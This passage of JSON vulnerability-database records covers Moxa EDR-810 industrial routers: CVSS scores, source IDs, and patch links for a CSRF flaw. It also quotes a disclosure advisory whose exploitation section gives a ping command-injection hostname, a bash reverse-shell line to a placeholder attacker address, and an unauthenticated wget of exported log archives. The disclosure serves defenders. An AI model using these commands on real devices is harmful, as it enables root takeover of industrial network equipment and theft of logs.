"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2017-12126",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2018-11727",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-102617",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "talos-cna@cisco.com",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-12126",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-12126",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "talos-cna@cisco.com",
"id": "CVE-2017-12126",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2018-11727",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201707-1627",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-102617",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11727"
},
{
"db": "VULHUB",
"id": "VHN-102617"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013429"
},
{
"db": "NVD",
"id": "CVE-2017-12126"
},
{
"db": "NVD",
"id": "CVE-2017-12126"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1627"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An exploitable cross-site request forgery vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP packet can cause cross-site request forgery. An attacker can create malicious HTML to trigger this vulnerability. Moxa EDR-810 Contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The EDR-810 is a highly integrated industrial multiport secure router with firewall/NAT/VPN and two layers of manageable switch functionality. Moxa EDR-810 is a secure router with firewall and VPN functions from Moxa",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-12126"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013429"
},
{
"db": "CNVD",
"id": "CNVD-2018-11727"
},
{
"db": "VULHUB",
"id": "VHN-102617"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "TALOS",
"id": "TALOS-2017-0478",
"trust": 3.1
},
{
"db": "NVD",
"id": "CVE-2017-12126",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013429",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1627",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-11727",
"trust": 0.6
},
{
"db": "SEEBUG",
"id": "SSVID-97226",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-102617",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11727"
},
{
"db": "VULHUB",
"id": "VHN-102617"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013429"
},
{
"db": "NVD",
"id": "CVE-2017-12126"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1627"
}
]
},
"id": "VAR-201805-0125",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11727"
},
{
"db": "VULHUB",
"id": "VHN-102617"
}
],
"trust": 1.35873015
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11727"
}
]
},
"last_update_date": "2023-12-18T12:50:46.626000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "EDR-810 Series",
"trust": 0.8,
"url": "https://www.moxa.com/product/edr-810.htm"
},
{
"title": "Patch for MoxaEDR-810 Cross-Site Request Forgery Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/132231"
},
{
"title": "Moxa EDR-810 Fixes for cross-site request forgery vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=190030"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11727"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013429"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1627"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-102617"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013429"
},
{
"db": "NVD",
"id": "CVE-2017-12126"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.talosintelligence.com/vulnerability_reports/talos-2017-0478"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-12126"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-12126"
},
{
"trust": 0.6,
"url": "https://talosintelligence.com/vulnerability_reports/talos-2017-0478"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11727"
},
{
"db": "VULHUB",
"id": "VHN-102617"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013429"
},
{
"db": "NVD",
"id": "CVE-2017-12126"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1627"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-11727"
},
{
"db": "VULHUB",
"id": "VHN-102617"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013429"
},
{
"db": "NVD",
"id": "CVE-2017-12126"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1627"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-11727"
},
{
"date": "2018-05-14T00:00:00",
"db": "VULHUB",
"id": "VHN-102617"
},
{
"date": "2018-07-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-013429"
},
{
"date": "2018-05-14T20:29:00.453000",
"db": "NVD",
"id": "CVE-2017-12126"
},
{
"date": "2017-07-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201707-1627"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-11727"
},
{
"date": "2022-12-09T00:00:00",
"db": "VULHUB",
"id": "VHN-102617"
},
{
"date": "2018-07-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-013429"
},
{
"date": "2022-12-09T01:50:02.347000",
"db": "NVD",
"id": "CVE-2017-12126"
},
{
"date": "2022-04-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201707-1627"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201707-1627"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa EDR-810 Cross-Site Request Forgery Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11727"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1627"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201707-1627"
}
],
"trust": 0.6
}
}
VAR-201910-1593
Vulnerability from variot - Updated: 2023-12-18 12:43Moxa EDR 810, all versions 5.1 and prior, allows an authenticated attacker to abuse the ping feature to execute unauthorized commands on the router, which may allow an attacker to perform remote code execution. Moxa EDR 810 Contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Moxa EDR-810 is a highly integrated industrial multi-port security router with firewall / NAT / VPN and hosted Layer 2 switch functions.
Moxa EDR-810 5.1 and earlier has a remote code execution vulnerability. An attacker could use this vulnerability to implement remote code execution. Moxa EDR 810 is an Ethernet router manufactured by Moxa Company in Taiwan, China. During an engagement for a client, RandoriSec found 2 vulnerabilities on Moxa EDR-810 Series Secure Routers. The first one is a command injection vulnerability found on the CLI allowing an authenticated user to obtain root privileges. And the other one is an improper access control found on the web server allowing to retrieve log files.
As usual, we reported those issues directly to Moxa and ICS-CERT (Industrial Control Systems Cyber Emergency Response Team) in order to “responsible disclose†them.
The ICS-CERT advisory was published on their website and a new EDR-810 firmware was provided by Moxa.
Many thanks to Moxa and ICS-CERT teams for their help.
Advisory
The following two product vulnerabilities were identified in Moxa’s EDR-810 Series Secure Routers, all versions 5.1 and prior are vulnerable:
CVE-2019-10969: An exploitable command injection vulnerability exists in the CLI functionality, which is provided by the Telnet and SSH services. As the CLI is executed with root privileges, it is possible to obtain a root shell on the device. A CVSS v3 base score of 7.2 has been calculated. CVE-2019-10963: An unauthenticated attacker can retrieve all the log files (Firewall, IPSec and System) from the webserver. In order to exploit the issue, a legitimate user had to export the log files previously. A CVSS v3 base score of 4.3 has been calculated.
Exploitation
CVE-2019-10969 - Ping Command Injection
The Telnet and SSH services provide a Command Line Interface (CLI), which is a restricted shell allowing to perform a subset of actions on the device. The ping function of the CLI is vulnerable to command injection. It is possible to specify a specific hostname, such as ($/bin/bash), in order to obtain a shell as shown below:
Ping command injection
Due to limitations on the CLI, it is not possible to use the shell as is. The attacker can use a reverse shell as shown below: bash -i >& /dev/tcp/YOUR_IP_ADDRESS/1234 0>&1
CVE-2019-10963 - Missing Access Control On Log Files
When a legitimate user (admin or configadmin for instance) export the logs files from the MOXA router. The files are stored at the root of the webserver, as follow:
http://IP_ADDRESS_MOXA/MOXA_All_LOG.tar.gz An attacker can retrieve this archive without being authenticated on the Web interface as shown below:
wget http://192.168.0.1/MOXA_All_LOG.tar.gz
--2019-02-13 17:35:19-- http://192.168.0.1/MOXA_All_LOG.tar.gz Connexion à 192.168.0.1:80... connecté. requête HTTP transmise, en attente de la réponse... 200 OK Taille : 15724 (15K) [text/plain] Sauvegarde en : " MOXA_All_LOG.tar.gz "
MOXA_All_LOG.tar.gz 100%[====================================================================================================================================>] 15,36K --.-KB/s ds 0s
2019-02-13 17:35:19 (152 MB/s) - " MOXA_All_LOG.tar.gz " sauvegardé [15724/15724]
tar ztvf MOXA_All_LOG.tar.gz
drwxr-xr-x admin/root 0 2019-02-13 11:55 moxa_log_all/ -rw-r--r-- admin/root 326899 2019-02-13 11:55 moxa_log_all/MOXA_Firewall_LOG.ini -rw-r--r-- admin/root 156 2019-02-13 11:55 moxa_log_all/MOXA_IPSec_LOG.ini -rw-r--r-- admin/root 68465 2019-02-13 11:55 moxa_log_all/MOXA_LOG.ini
Mitigation
It is recommended to install at least the firmware version 5.3 from Moxa website.
Timeline
2019-02-24: Vendor Disclosure 2019-02-24: Advisory sent to ICS-CERT 2019-09-30: Advisory published by Moxa 2019-10-01: Advisory published by ICS-CERT
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201910-1593",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "edr-810",
"scope": "lte",
"trust": 1.0,
"vendor": "moxa",
"version": "5.1"
},
{
"model": "edr-810 series",
"scope": "lte",
"trust": 0.8,
"vendor": "moxa",
"version": "5.1"
},
{
"model": "edr-810",
"scope": "lte",
"trust": 0.6,
"vendor": "moxa",
"version": "\u003c=5.1"
},
{
"model": "edr-810",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": null
},
{
"model": "edr-810",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "5.1"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-43363"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010769"
},
{
"db": "NVD",
"id": "CVE-2019-10969"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-006"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:edr-810_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "5.1",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:edr-810:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-10969"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "RandoriSec",
"sources": [
{
"db": "PACKETSTORM",
"id": "154943"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-006"
}
],
"trust": 0.7
},
"cve": "CVE-2019-10969",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2019-10969",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CNVD-2019-43363",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "VHN-142568",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.2,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-10969",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-10969",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2019-43363",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201910-006",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-142568",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-43363"
},
{
"db": "VULHUB",
"id": "VHN-142568"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010769"
},
{
"db": "NVD",
"id": "CVE-2019-10969"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-006"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa EDR 810, all versions 5.1 and prior, allows an authenticated attacker to abuse the ping feature to execute unauthorized commands on the router, which may allow an attacker to perform remote code execution. Moxa EDR 810 Contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Moxa EDR-810 is a highly integrated industrial multi-port security router with firewall / NAT / VPN and hosted Layer 2 switch functions. \n\nMoxa EDR-810 5.1 and earlier has a remote code execution vulnerability. An attacker could use this vulnerability to implement remote code execution. Moxa EDR 810 is an Ethernet router manufactured by Moxa Company in Taiwan, China. During an engagement for a client, RandoriSec found 2 vulnerabilities on Moxa EDR-810 Series Secure Routers. The first one is a command injection vulnerability found on the CLI allowing an authenticated user to obtain root privileges. And the other one is an improper access control found on the web server allowing to retrieve log files. \n\nAs usual, we reported those issues directly to Moxa and ICS-CERT (Industrial Control Systems Cyber Emergency Response Team) in order to \u00e2\u20ac\u0153responsible disclose\u00e2\u20ac them. \n\nThe ICS-CERT advisory was published on their website and a new EDR-810 firmware was provided by Moxa. \n\nMany thanks to Moxa and ICS-CERT teams for their help. \n\n\n\nAdvisory\n\nThe following two product vulnerabilities were identified in Moxa\u00e2\u20ac\u2122s EDR-810 Series Secure Routers, all versions 5.1 and prior are vulnerable:\n\nCVE-2019-10969: An exploitable command injection vulnerability exists in the CLI functionality, which is provided by the Telnet and SSH services. As the CLI is executed with root privileges, it is possible to obtain a root shell on the device. A CVSS v3 base score of 7.2 has been calculated. \nCVE-2019-10963: An unauthenticated attacker can retrieve all the log files (Firewall, IPSec and System) from the webserver. In order to exploit the issue, a legitimate user had to export the log files previously. A CVSS v3 base score of 4.3 has been calculated. \n\n\nExploitation\n\nCVE-2019-10969 - Ping Command Injection\n\nThe Telnet and SSH services provide a Command Line Interface (CLI), which is a restricted shell allowing to perform a subset of actions on the device. The ping function of the CLI is vulnerable to command injection. It is possible to specify a specific hostname, such as ($/bin/bash), in order to obtain a shell as shown below: \n\nPing command injection\n\nDue to limitations on the CLI, it is not possible to use the shell as is. The attacker can use a reverse shell as shown below:\nbash -i \u003e\u0026 /dev/tcp/YOUR_IP_ADDRESS/1234 0\u003e\u00261\n\n\nCVE-2019-10963 - Missing Access Control On Log Files\n\nWhen a legitimate user (admin or configadmin for instance) export the logs files from the MOXA router. The files are stored at the root of the webserver, as follow:\n\nhttp://IP_ADDRESS_MOXA/MOXA_All_LOG.tar.gz\nAn attacker can retrieve this archive without being authenticated on the Web interface as shown below:\n\n# wget http://192.168.0.1/MOXA_All_LOG.tar.gz\n--2019-02-13 17:35:19-- http://192.168.0.1/MOXA_All_LOG.tar.gz\nConnexion \u00c3 192.168.0.1:80... connect\u00c3\u00a9. \nrequ\u00c3\u00aate HTTP transmise, en attente de la r\u00c3\u00a9ponse... 200 OK\nTaille : 15724 (15K) [text/plain]\nSauvegarde en : \" MOXA_All_LOG.tar.gz \"\n\nMOXA_All_LOG.tar.gz 100%[====================================================================================================================================\u003e] 15,36K --.-KB/s ds 0s \n\n2019-02-13 17:35:19 (152 MB/s) - \" MOXA_All_LOG.tar.gz \" sauvegard\u00c3\u00a9 [15724/15724]\n\n# tar ztvf MOXA_All_LOG.tar.gz \ndrwxr-xr-x admin/root 0 2019-02-13 11:55 moxa_log_all/\n-rw-r--r-- admin/root 326899 2019-02-13 11:55 moxa_log_all/MOXA_Firewall_LOG.ini\n-rw-r--r-- admin/root 156 2019-02-13 11:55 moxa_log_all/MOXA_IPSec_LOG.ini\n-rw-r--r-- admin/root 68465 2019-02-13 11:55 moxa_log_all/MOXA_LOG.ini\n\n\nMitigation\n\nIt is recommended to install at least the firmware version 5.3 from Moxa website. \n\n\n\nTimeline\n\n2019-02-24: Vendor Disclosure\n2019-02-24: Advisory sent to ICS-CERT\n2019-09-30: Advisory published by Moxa\n2019-10-01: Advisory published by ICS-CERT\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-10969"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010769"
},
{
"db": "CNVD",
"id": "CNVD-2019-43363"
},
{
"db": "VULHUB",
"id": "VHN-142568"
},
{
"db": "PACKETSTORM",
"id": "154943"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-10969",
"trust": 3.2
},
{
"db": "ICS CERT",
"id": "ICSA-19-274-03",
"trust": 2.5
},
{
"db": "PACKETSTORM",
"id": "154943",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010769",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201910-006",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-43363",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.3697",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-142568",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-43363"
},
{
"db": "VULHUB",
"id": "VHN-142568"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010769"
},
{
"db": "PACKETSTORM",
"id": "154943"
},
{
"db": "NVD",
"id": "CVE-2019-10969"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-006"
}
]
},
"id": "VAR-201910-1593",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-43363"
},
{
